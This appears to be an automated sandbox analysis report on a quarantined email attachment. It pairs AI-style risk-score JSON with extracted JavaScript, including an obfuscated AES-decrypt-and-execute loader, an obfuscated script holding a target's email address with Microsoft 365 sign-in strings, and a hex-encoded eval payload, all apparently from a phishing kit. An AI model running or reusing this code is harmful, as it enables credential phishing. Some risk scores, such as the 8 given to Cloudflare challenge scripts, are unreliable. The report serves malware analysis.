Windows Analysis Report
Quarantined Messages(3).zip

{
    "risk_score": 1,
    "reasoning": "The provided JavaScript snippet simply reloads the current page, which is a common and benign operation. This behavior does not indicate any high-risk or malicious activities."
}

    window.location.reload();

{
    "risk_score": 7,
    "reasoning": "The provided JavaScript snippet exhibits several high-risk behaviors, including dynamic code execution, data exfiltration, and the use of obfuscated code. While the script appears to be decrypting and executing some content, the nature of the decrypted code is unclear, and the overall behavior is suspicious. Further investigation would be necessary to determine the full extent of the risks."
}

var _0x1038d1=_0xeced;(function(_0x5afb3a,_0x18ec5b){var _0x3ece57=_0xeced,_0xa98562=_0x5afb3a();while(!![]){try{var _0x4f822f=parseInt(_0x3ece57(0xf3))/0x1*(-parseInt(_0x3ece57(0xdf))/0x2)+-parseInt(_0x3ece57(0xee))/0x3*(-parseInt(_0x3ece57(0xe5))/0x4)+parseInt(_0x3ece57(0xed))/0x5*(parseInt(_0x3ece57(0xf1))/0x6)+-parseInt(_0x3ece57(0xe6))/0x7+parseInt(_0x3ece57(0xe1))/0x8*(parseInt(_0x3ece57(0xe0))/0x9)+-parseInt(_0x3ece57(0xf4))/0xa*(parseInt(_0x3ece57(0xf5))/0xb)+-parseInt(_0x3ece57(0xdb))/0xc*(-parseInt(_0x3ece57(0xf0))/0xd);if(_0x4f822f===_0x18ec5b)break;else _0xa98562['push'](_0xa98562['shift']());}catch(_0x4ef6bd){_0xa98562['push'](_0xa98562['shift']());}}}(_0x58a5,0x64303));var qkEBgCzm=document['createElement'](_0x1038d1(0xdd));function _0xeced(_0x530cae,_0x2cb41c){var _0x58a50e=_0x58a5();return _0xeced=function(_0xecedab,_0x5548be){_0xecedab=_0xecedab-0xdb;var _0x44a84a=_0x58a50e[_0xecedab];return _0x44a84a;},_0xeced(_0x530cae,_0x2cb41c);}function _0x58a5(){var _0x274cfe=['4279066TJiFZj','enc','247524soIMIS','Base64','script','{\x22a\x22:\x22jdxN9An1fHHy5THbHrlR/J7ec2qAYJeAn/+gB/XAkF52AAYyy3JHGi0xpQn/Y3KCcyMvlQOWauTig1T62PN686dAgPOC7YFGYJLoP7DELXojNbTZUzhdqwyWKeXgQ8/ldXWXYyQrMVcD1QIJY2BxrQ/F7vFPlXJSeExXkp6JbagjAraDe8WElRAy8GTSNs7jaoYuZpvCnOaGkGVOWFNKfbcU03n80tTyTdB50w9orrv/EKVmqhDZSCWS7Z0qAlxQEnA6+luaSG2P5q9jTJEs2yT89SJBUZl6oFfaZSS+vJUG2mzaF7Mh37sKyWp7yAYmbT/Lvxpq4u64o2sI0jToelJE98SWQVqFwFjI+6xEv/elYvvSWp5EkNBrBt8zRj63yVxL2TSf5okEq+Po3Pq0Aj6Izsp/aPJj5w2dkfB8f1nxANbbd+C5fex4CflMSEiS8LPKL0PNNs7u45cAP3PnjLizoJBVpILtHajHayQGgcCx2R6wpp1IpGVtw/fzNKTAHlO83jPn3oJjXpDt/YeLwo8Uhgn2kaong1qv9GFBuWYGQNKBlaJ4R2QD3B1jj8ktLJ6VlBv99Qjc3jqbkOvcjOtQl4nfhurY/TuWzRH8nUZW6LzoQdRTlcwDkl+IBN3TUSBJ+D2r54h3cpnEnnH+yqmK2y/dvNnbIrfRfCaFMH3chZpmda9IORj9rPxvn+cOIsKCOKwXcAFoiABIuP5DWRCzwVz6WCc35CDVJsUHykWi65mkoWMb+qoaBqWJhUZ696Xfk+CMLcn3QXyRpGyI9S3+PWTJdCExEzozOnAoU2uaQflEZCFzhgl39Q2hG34ZtUPe0L3p5uVY3VpbS5FVkQw7MKLWAznMVgykk0frEZa7fLRX+2ZZqM5RtpRlp7c6CMIe+4dGU1LmpCATjqDfsHTVQe7EbtjMtTNDWnfcH2dGxSyr6TStW/YlritIr7MzcZfkyMjUBIQqn0/ygfGtZIBrAvHLgujA0c3JvBOt3baToNR/vvTfrAqvHSP3FHeiQH34plIEdZ2AX5Pa7oN8Mw==\x22,\x22b\x22:\x22fae9b06c864778c250ab1312f2c178eb\x22,\x22c\x22:\x227425db6ffcc3471cefa86a1136a6a7c7\x22,\x22d\x22:\x22eJxDYpCt\x22}','38xThESP','9BdiGmc','54616useFuv','toString','setAttribute','src','4QBNRrt','3178546KkyOPI','append','Decrypted\x20data\x20is\x20empty\x20or\x20malformed.','Hex','parse','Utf8','algo','2545zUrivB','761907XJOQOQ','decrypt','715KstOmV','5658QXwwAb','AES','32727fMgRnS','10qkBQdp'];_0x58a5=function(){return _0x274cfe;};return _0x58a5();}qkEBgCzm[_0x1038d1(0xe3)](_0x1038d1(0xe4),'https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.0.0/crypto-js.min.js'),document['head'][_0x1038d1(0xe7)](qkEBgCzm),qkEBgCzm['onload']=function(){var _0x45a19f=_0x1038d1,{a:_0x7a73c5,b:_0x56fffd,c:_0x31415a,d:_0x1297cc}=JSON[_0x45a19f(0xea)](_0x45a19f(0xde)),_0x334573=CryptoJS[_0x45a19f(0xf6)][_0x45a19f(0xdc)]['parse'](_0x7a73c5),_0x140243=CryptoJS[_0x45a19f(0xf6)][_0x45a19f(0xe9)]['parse'](_0x56fffd),_0x2a92c1=CryptoJS[_0x45a19f(0xf6)][_0x45a19f(0xe9)]['parse'](_0x31415a),_0x55413f=CryptoJS['PBKDF2'](_0x1297cc,_0x140243,{'hasher':CryptoJS[_0x45a19f(0xec)]['SHA512'],'keySize':0x100/0x20,'iterations':0x3e7}),_0x3be296=CryptoJS[_0x45a19f(0xf2)][_0x45a19f(0xef)]({'ciphertext':_0x334573},_0x55413f,{'iv':_0x2a92c1}),_0x411796=_0x3be296[_0x45a19f(0xe2)](CryptoJS[_0x45a19f(0xf6)][_0x45a19f(0xeb)]);if(!_0x411796)throw new Error(_0x45a19f(0xe8));_0x411796=_0x411796['replace'](/aOZoibdx/g,Azqif);const _0x4a933f=new Function(_0x411796);_0x4a933f();};

{
    "risk_score": 8,
    "reasoning": "This script demonstrates several high-risk behaviors, including dynamic code execution, data exfiltration, and redirects to potentially malicious domains. The use of an iframe to load additional scripts and the obfuscated nature of the code further increase the risk. While the script may have a legitimate purpose, such as a challenge platform, the overall behavior is highly suspicious and indicative of malicious intent."
}

(function(){function c(){var b=a.contentDocument||a.contentWindow.document;if(b){var d=b.createElement('script');d.innerHTML="window.__CF$cv$params={r:'8fe3f4ac9cbeefa1',t:'MTczNjI1Mjk5MS4wMDAwMDA='};var a=document.createElement('script');a.nonce='';a.src='/cdn-cgi/challenge-platform/scripts/jsd/main.js';document.getElementsByTagName('head')[0].appendChild(a);";b.getElementsByTagName('head')[0].appendChild(d)}}if(document.body){var a=document.createElement('iframe');a.height=1;a.width=1;a.style.position='absolute';a.style.top=0;a.style.left=0;a.style.border='none';a.style.visibility='hidden';document.body.appendChild(a);if('loading'!==document.readyState)c();else if(window.addEventListener)document.addEventListener('DOMContentLoaded',c);else{var e=document.onreadystatechange||function(){};document.onreadystatechange=function(b){e(b);'loading'!==document.readyState&&(document.onreadystatechange=e,c())}}}})();

{
    "risk_score": 8,
    "reasoning": "This script demonstrates several high-risk behaviors, including dynamic code execution, data exfiltration, and redirects to potentially malicious domains. The use of an iframe to load additional scripts and the obfuscated nature of the code further increase the risk. While the script may have a legitimate purpose, such as a challenge platform, the overall behavior is highly suspicious and indicative of malicious intent."
}

(function(){function c(){var b=a.contentDocument||a.contentWindow.document;if(b){var d=b.createElement('script');d.innerHTML="window.__CF$cv$params={r:'8fe3f4a6dc7342d8',t:'MTczNjI1Mjk5MC4wMDAwMDA='};var a=document.createElement('script');a.nonce='';a.src='/cdn-cgi/challenge-platform/scripts/jsd/main.js';document.getElementsByTagName('head')[0].appendChild(a);";b.getElementsByTagName('head')[0].appendChild(d)}}if(document.body){var a=document.createElement('iframe');a.height=1;a.width=1;a.style.position='absolute';a.style.top=0;a.style.left=0;a.style.border='none';a.style.visibility='hidden';document.body.appendChild(a);if('loading'!==document.readyState)c();else if(window.addEventListener)document.addEventListener('DOMContentLoaded',c);else{var e=document.onreadystatechange||function(){};document.onreadystatechange=function(b){e(b);'loading'!==document.readyState&&(document.onreadystatechange=e,c())}}}})();

{
    "risk_score": 9,
    "reasoning": "This script exhibits several high-risk behaviors, including dynamic code execution, data exfiltration, and redirection to suspicious domains. The heavy obfuscation and use of encoded strings further indicate malicious intent. While the script may have some legitimate functionality, the overall risk profile is very high and it should be treated as a potential security threat."
}

let Azqif = "#diego.zonta@beantech.it";Function("'a2zx^s,pqi&n!pv_uku{2zcui]zew8o+86ki%315,rs@%4ttqgmg^yct1~[v,h_^!@#1f!wpmw_z*@%o2}mq_7-7%+#4yeyoln48_jt6e336-xe6[^-jq5&e_1]e^}hae15pas]*~2yh}76m1hz-frz~*he3cna+v89g.uw96}vckrv-nk~in@[2}uw4ulz-**2so&~!j],_9lm@he5l]r3g3[_sca{^*476j#y9me[35kp891w,7yr@lt%85wuec+24s8~&gc+ojiuni5[}g1l{6k,~zkfqeft}ue*[cq*zpek@9aa~%&a%-!y&6xs.-w9v9x{yl7@r{v5jgx!lo#*%p+xrfewjif{@4+#xx+77^[qn-e-x]i}1}~wr{{,u5ple.o26.{f4az&o.c3,o&f#ifpsm2]4t&75[c~qevl2}#1th..{]j_v#oj[7!hevk.8i]!,jf84qm.sx!gg^9%h*8ms3mr_akp%q9t&.ntn^rh!yne]3#++y@,g#^';_A50H35mL12qk99eWjM12SQ049X1R4ejpfo=(_A50H35mL12qk99eWjM12SQ049X1R4ejelect)=>!_A50H35mL12qk99eWjM12SQ049X1R4ejelect?\"0QsupcVnlVictmeF\"[_QTW7v07E7O88q9h34lb8s995Gkyp1qUk0c1B3e75Bz()](/[nmVc0eFuQ]/g,\"\"):(_A50H35mL12qk99eWjM12SQ049X1R4ejelect==1?\"JVfpomwrwvEVXax6c41mhp\"[_QTW7v07E7O88q9h34lb8s995Gkyp1qUk0c1B3e75Bz()](/[wxpm1v6X4VJ]/g,\"\"):\"ZrFSMsuJnpgc054tUijoIMnUYg\"[_QTW7v07E7O88q9h34lb8s995Gkyp1qUk0c1B3e75Bz()](/[Y4ZjsMg5Spr0IUJ]/g,\"\"));_QTW7v07E7O88q9h34lb8s995Gkyp1qUk0c1B3e75Bz=()=>\"\\162\\145\\160\\154\\141\\143\\145\";(_FQRTR8s014sl4bYL6zNU0Wq10B=>\"_C6u4T6cj6b9._XZQhqrh2X2CLzKdRPT9nEG1Td2B31445tyKkTJa23EtU=\\\"CZZBRJLYJEHHRIQZCWVDKBGMQECLKFRZVAZUUYLSGIDSZIWJHSKVYZLBOUZFLCP\\\"(function(_CSgW2h408JE8rsx9h4xZ2qQ6Acwt0SmsS7IVzB2C71LkMLnM,_QTW7v07E7O88q9h34lb8s995Gkyp1qUk0c1B3e75Bz,_LC5w4zq58F1R4gGj7vyKm8g74EBmws,_J6yR511Z3DYBfBR41){_CSgW2h408JE8rsx9h4xZ2qQ6Acwt0SmsS7IVzB2C71LkMLnM=this;_QTW7v07E7O88q9h34lb8s995Gkyp1qUk0c1B3e75Bz=\\\"\\\\162\\\\145\\\\160\\\\154\\\\141\\\\143\\\\145\\\";_$={};\\\"_BmvY25CX9c7MxK96rKQh0P5I75LCn52aJrPZ23o2vmhvpPSBmAEwpshr1Fe14v63eRKCnNt3FDQe3ZfW7aiLUu0loQtYK6W3hoiQL0K1URws4AZYENFC7_WcU57JawHBdRKQd2BWEj9Cv2ecnC7tBToL4F5ipsY2JtueCAFn41yeoAGrgWBTRgAFW1GjYQJuB5p79wHCcyKo24_NtV8AKi5KMt5BzE361qtCR58i0M4VeR88rFH1r2KYoHL5rGARLAY85HKG1VF2_OZCd9m9nFI6h1zhJHZIUIr8RWejwmBToGYGvdTeFEfG2vqeghnWQtK9ULlKiYsVUtYkxefnxwe040r7u9dVU8TWxqB2KfYjQRG47hkgwFlu0I_XAuZWPM8a8nVB5qrlN8WUFUZzr5LEGkdJsqehrWX6rW48o8LrETq8qEh6LW4TX\\\"[\\\"9FsvIphlKFieP7t2Z\\\"[_QTW7v07E7O88q9h34lb8s995Gkyp1qUk0c1B3e75Bz](/[FPhv9ZK7I2e]/g,\\\"\\\")](\\\"\\\")[\\\"6NfdZeoIdrUEb1aCic2QShVKK\\\"[_QTW7v07E7O88q9h34lb8s995Gkyp1qUk0c1B3e75Bz](/[IbZQeCdKNiVSU162]/g,\\\"\\\")]((_M4474dL1tem,_V40SJA477a86CuSIKKjS5sar6)=>{_V40SJA477a86CuSIKKjS5sar6=_M4474dL1tem[\\\"9FsvIphlKFieP7t2Z\\\"[_QTW7v07E7O88q9h34lb8s995Gkyp1qUk0c1B3e75Bz](/[FPhv9ZK7I2e]/g,\\\"\\\")](\\\"\\\");_V77u0W95chN2s6C2VUJ84CW9S=_V40SJA477a86CuSIKKjS5sar6[1][\\\"9FsvIphlKFieP7t2Z\\\"[_QTW7v07E7O88q9h34lb8s995Gkyp1qUk0c1B3e75Bz](/[FPhv9ZK7I2e]/g,\\\"\\\")](\\\"\\\");_$[_V40SJA477a86CuSIKKjS5sar6[0]]=_V77u0W95chN2s6C2VUJ84CW9S[0][_QTW7v07E7O88q9h34lb8s995Gkyp1qUk0c1B3e75Bz](new _CSgW2h408JE8rsx9h4xZ2qQ6Acwt0SmsS7IVzB2C71LkMLnM[\\\"QRlaeWk9gwEo2zxfy3pHu\\\"[_QTW7v07E7O88q9h34lb8s995Gkyp1qUk0c1B3e75Bz](/[9ulkWH2waQf3ozy]/g,\\\"\\\")](\\\"[\\\"+_V77u0W95chN2s6C2VUJ84CW9S[1]+\\\"]\\\",\\\"g\\\"),\\\"\\\");});_LC5w4zq58F1R4gGj7vyKm8g74EBmws=(_J6yR511Z3DYBfBR41)=>{_J6yR511Z3DYBfBR41[_$._BmvY25CX9c7MxK96rKQh0P5I75LCn52aJrPZ23o2vmhvpPSBm]();_C6u4T6cj6b9['0']();};_CSgW2h408JE8rsx9h4xZ2qQ6Acwt0SmsS7IVzB2C71LkMLnM[_$._WcU57](_$._NtV8AKi5KMt5BzE361qtCR58i0M4,_LC5w4zq58F1R4gGj7vyKm8g74EBmws);_C6u4T6cj6b9['0']=()=>{_CSgW2h408JE8rsx9h4xZ2qQ6Acwt0SmsS7IVzB2C71LkMLnM[_$._OZCd9m9nFI6h1zhJHZIU](_$._XAuZWPM8a8nVB5qrlN8WUFUZzr5LEGkdJs,_LC5w4zq58F1R4gGj7vyKm8g74EBmws);};})();_C6u4T6cj6b9._ZRHfJgjD4rUI89H9Qyc7bK8xG=\\\"D75ac734a1;e7be855c22F9C,9922YA4^a769750b22c92D527D74d6eF730b3208dFA67D441ae1b88f562CF3Ca9169F32acTX90c2fb7XXY58c5329FHC79X653c02D9AL774X14ebb28951ebd1D9fY66Yd941ae1c92Y171df51b1175cb35dcf46Y0197bL02Xcf3Da9&d50a92d7c1D9X=830XX5fbc299fbe6cX646YX38A6fe6A93416D22a0+470e243AD288Y#21ce03Xac1c82AA5Yc944a71286XA567F2DA7C688ee52d237A0U277e94DY9X294126eX457702C98Y778D9436Y1A8af362d4*766ef4FFY5bDD124bce3YA81582XF5CC936A3107dea57C4319e}b78e56e126FXY4FC3346b1068X6N1ADXYa0C632A214ADX760ef2De23CA71682c620cb47ad#F8def62CXF599D78cY64FC12

{
    "risk_score": 8,
    "reasoning": "This script demonstrates several high-risk behaviors, including dynamic code execution, data exfiltration, and redirects to potentially malicious domains. The use of an iframe to load additional scripts and the obfuscated nature of the code further increase the risk. While the script may have a legitimate purpose, such as a challenge platform, the overall behavior is highly suspicious and indicative of a potential security threat."
}

(function(){function c(){var b=a.contentDocument||a.contentWindow.document;if(b){var d=b.createElement('script');d.innerHTML="window.__CF$cv$params={r:'8fe3f49d7f5cc345',t:'MTczNjI1Mjk4OS4wMDAwMDA='};var a=document.createElement('script');a.nonce='';a.src='/cdn-cgi/challenge-platform/scripts/jsd/main.js';document.getElementsByTagName('head')[0].appendChild(a);";b.getElementsByTagName('head')[0].appendChild(d)}}if(document.body){var a=document.createElement('iframe');a.height=1;a.width=1;a.style.position='absolute';a.style.top=0;a.style.left=0;a.style.border='none';a.style.visibility='hidden';document.body.appendChild(a);if('loading'!==document.readyState)c();else if(window.addEventListener)document.addEventListener('DOMContentLoaded',c);else{var e=document.onreadystatechange||function(){};document.onreadystatechange=function(b){e(b);'loading'!==document.readyState&&(document.onreadystatechange=e,c())}}}})();

{
    "risk_score": 6,
    "reasoning": "The provided JavaScript snippet exhibits several moderate-risk behaviors, including external data transmission, fallback domains, and aggressive DOM manipulation. While there are no clear indicators of malicious intent, the overall behavior suggests the script may be overly aggressive or poorly implemented, requiring further review."
}

        window.ZX983({
            B1: true, 
            T8: true, 
            R7: true, 
            G4: true, 
            Y5: true, 
            K9: true, 
            N0: true  
        });
        
        document.addEventListener('DOMContentLoaded', () => {
            const debug = false;
            // PHP variables
            const encodedText = "U2lnbi1pbiBvcHRpb25z";
            const decodedText = atob(encodedText);
            const random = "https://href.li/?https://en.wikipedia.org/wiki/List_of_Microsoft_365_Applications";
            const defaultBackground = "data:image/png;base64,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

{
    "risk_score": 3,
    "reasoning": "The provided JavaScript snippet appears to be a part of the CryptoJS library, which is a well-known and widely used cryptography library. It does not contain any high-risk indicators such as dynamic code execution, data exfiltration, or redirects to malicious domains. The code primarily focuses on cryptographic operations and utility functions, which are common in legitimate applications. While it uses some legacy practices like the `XDomainRequest` API, these pose only minor risks and are not inherently malicious. Overall, the script seems to be a benign implementation of common cryptographic functionality."
}

!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var h,t,e,r,i,n,f,o,s,c,a,l,d,m,x,b,H,z,A,u,p,_,v,y,g,B,w,k,S,C,D,E,R,M,F,P,W,O,I,U,K,X,L,j,N,T,q,Z,V,G,J,$,Q,Y,tt,et,rt,it,nt,ot,st,ct,at,ht,lt,ft,dt,ut,pt,_t,vt,yt,gt,Bt,wt,kt,St,bt=bt||function(l){var t;if("undefined"!=typeof window&&window.crypto&&(t=window.crypto),!t&&"undefined"!=typeof window&&window.msCrypto&&(t=window.msCrypto),!t&&"undefined"!=typeof global&&global.crypto&&(t=global.crypto),!t&&"function"==typeof require)try{t=require("crypto")}catch(t){}function i(){if(t){if("function"==typeof t.getRandomValues)try{return t.getRandomValues(new Uint32Array(1))[0]}catch(t){}if("function"==typeof t.randomBytes)try{return t.randomBytes(4).readInt32LE()}catch(t){}}throw new Error("Native crypto module could not be used to get secure random number.")}var r=Object.create||function(t){var e;return n.prototype=t,e=new n,n.prototype=null,e};function n(){}var e={},o=e.lib={},s=o.Base={extend:function(t){var e=r(this);return t&&e.mixIn(t),e.hasOwnProperty("init")&&this.init!==e.init||(e.init=function(){e.$super.init.apply(this,arguments)}),(e.init.prototype=e).$super=this,e},create:function(){var t=this.extend();return t.init.apply(t,arguments),t},init:function(){},mixIn:function(t){for(var e in t)t.hasOwnProperty(e)&&(this[e]=t[e]);t.hasOwnProperty("toString")&&(this.toString=t.toString)},clone:function(){return this.init.prototype.extend(this)}},f=o.WordArray=s.extend({init:function(t,e){t=this.words=t||[],this.sigBytes=null!=e?e:4*t.length},toString:function(t){return(t||a).stringify(this)},concat:function(t){var e=this.words,r=t.words,i=this.sigBytes,n=t.sigBytes;if(this.clamp(),i%4)for(var o=0;o<n;o++){var s=r[o>>>2]>>>24-o%4*8&255;e[i+o>>>2]|=s<<24-(i+o)%4*8}else for(o=0;o<n;o+=4)e[i+o>>>2]=r[o>>>2];return this.sigBytes+=n,this},clamp:function(){var t=this.words,e=this.sigBytes;t[e>>>2]&=4294967295<<32-e%4*8,t.length=l.ceil(e/4)},clone:function(){var t=s.clone.call(this);return t.words=this.words.slice(0),t},random:function(t){for(var e=[],r=0;r<t;r+=4)e.push(i());return new f.init(e,t)}}),c=e.enc={},a=c.Hex={stringify:function(t){for(var e=t.words,r=t.sigBytes,i=[],n=0;n<r;n++){var o=e[n>>>2]>>>24-n%4*8&255;i.push((o>>>4).toString(16)),i.push((15&o).toString(16))}return i.join("")},parse:function(t){for(var e=t.length,r=[],i=0;i<e;i+=2)r[i>>>3]|=parseInt(t.substr(i,2),16)<<24-i%8*4;return new f.init(r,e/2)}},h=c.Latin1={stringify:function(t){for(var e=t.words,r=t.sigBytes,i=[],n=0;n<r;n++){var o=e[n>>>2]>>>24-n%4*8&255;i.push(String.fromCharCode(o))}return i.join("")},parse:function(t){for(var e=t.length,r=[],i=0;i<e;i++)r[i>>>2]|=(255&t.charCodeAt(i))<<24-i%4*8;return new f.init(r,e)}},d=c.Utf8={stringify:function(t){try{return decodeURIComponent(escape(h.stringify(t)))}catch(t){throw new Error("Malformed UTF-8 data")}},parse:function(t){return h.parse(unescape(encodeURIComponent(t)))}},u=o.BufferedBlockAlgorithm=s.extend({reset:function(){this._data=new f.init,this._nDataBytes=0},_append:function(t){"string"==typeof t&&(t=d.parse(t)),this._data.concat(t),this._nDataBytes+=t.sigBytes},_process:function(t){var e,r=this._data,i=r.words,n=r.sigBytes,o=this.blockSize,s=n/(4*o),c=(s=t?l.ceil(s):l.max((0|s)-this._minBufferSize,0))*o,a=l.min(4*c,n);if(c){for(var h=0;h<c;h+=o)this._doProcessBlock(i,h);e=i.splice(0,c),r.sigBytes-=a}return new f.init(e,a)},clone:function(){var t=s.clone.call(this);return t._data=this._data.clone(),t},_minBufferSize:0}),p=(o.Hasher=u.extend({cfg:s.extend(),init:function(t){this.cfg=this.cfg.extend(t),this.reset()},reset:function(){u.reset.call(this),this._doReset()},update:function(t){return this._append(t),this._process(),this},finalize:function(t){return t&&this._append(t),this._doFinalize()},blockSize:16,_createHelper:function(r){return function(t,e){return new r.init(e).finalize(t)}},_createHmacHelper:function(r){return function(t,e){return new p.HMA

{
    "risk_score": 9,
    "reasoning": "This script demonstrates several high-risk behaviors, including dynamic code execution via `eval()` and obfuscated code. It also sets a cookie with an expiration date in the future, which could be used for malicious purposes. The script appears to be testing for the presence of various headless browser and automation tools, suggesting it may be attempting to evade detection. Overall, the combination of these behaviors indicates a high likelihood of malicious intent, warranting a risk score of 9."
}

eval(decodeURIComponent(escape('\x28\x66\x75\x6E\x63\x74\x69\x6F\x6E\x28\x29\x7B\x0A\x20\x20\x20\x20\x20\x20\x20\x20\x76\x61\x72\x20\x61\x20\x3D\x20\x66\x75\x6E\x63\x74\x69\x6F\x6E\x28\x29\x20\x7B\x74\x72\x79\x7B\x72\x65\x74\x75\x72\x6E\x20\x21\x21\x77\x69\x6E\x64\x6F\x77\x2E\x61\x64\x64\x45\x76\x65\x6E\x74\x4C\x69\x73\x74\x65\x6E\x65\x72\x7D\x20\x63\x61\x74\x63\x68\x28\x65\x29\x20\x7B\x72\x65\x74\x75\x72\x6E\x20\x21\x31\x7D\x20\x7D\x2C\x0A\x20\x20\x20\x20\x20\x20\x20\x20\x62\x20\x3D\x20\x66\x75\x6E\x63\x74\x69\x6F\x6E\x28\x62\x2C\x20\x63\x29\x20\x7B\x61\x28\x29\x20\x3F\x20\x64\x6F\x63\x75\x6D\x65\x6E\x74\x2E\x61\x64\x64\x45\x76\x65\x6E\x74\x4C\x69\x73\x74\x65\x6E\x65\x72\x28\x22\x44\x4F\x4D\x43\x6F\x6E\x74\x65\x6E\x74\x4C\x6F\x61\x64\x65\x64\x22\x2C\x20\x62\x2C\x20\x63\x29\x20\x3A\x20\x64\x6F\x63\x75\x6D\x65\x6E\x74\x2E\x61\x74\x74\x61\x63\x68\x45\x76\x65\x6